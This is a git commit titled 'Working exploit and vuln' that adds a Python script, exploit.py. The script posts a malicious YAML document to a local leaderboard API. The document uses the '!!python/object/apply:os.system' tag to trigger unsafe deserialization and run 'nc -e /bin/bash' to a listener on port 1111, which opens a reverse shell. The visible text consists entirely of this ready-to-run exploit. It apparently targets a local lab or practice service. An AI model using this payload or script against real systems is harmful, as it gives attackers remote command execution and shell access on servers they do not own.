Working exploit and vuln

2025-12-05 04:51:03 +01:00
parent 75c31a474f
commit adcb48800c
2 changed files with 23 additions and 2 deletions
--- a/exploit.py
+++ b/exploit.py
@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)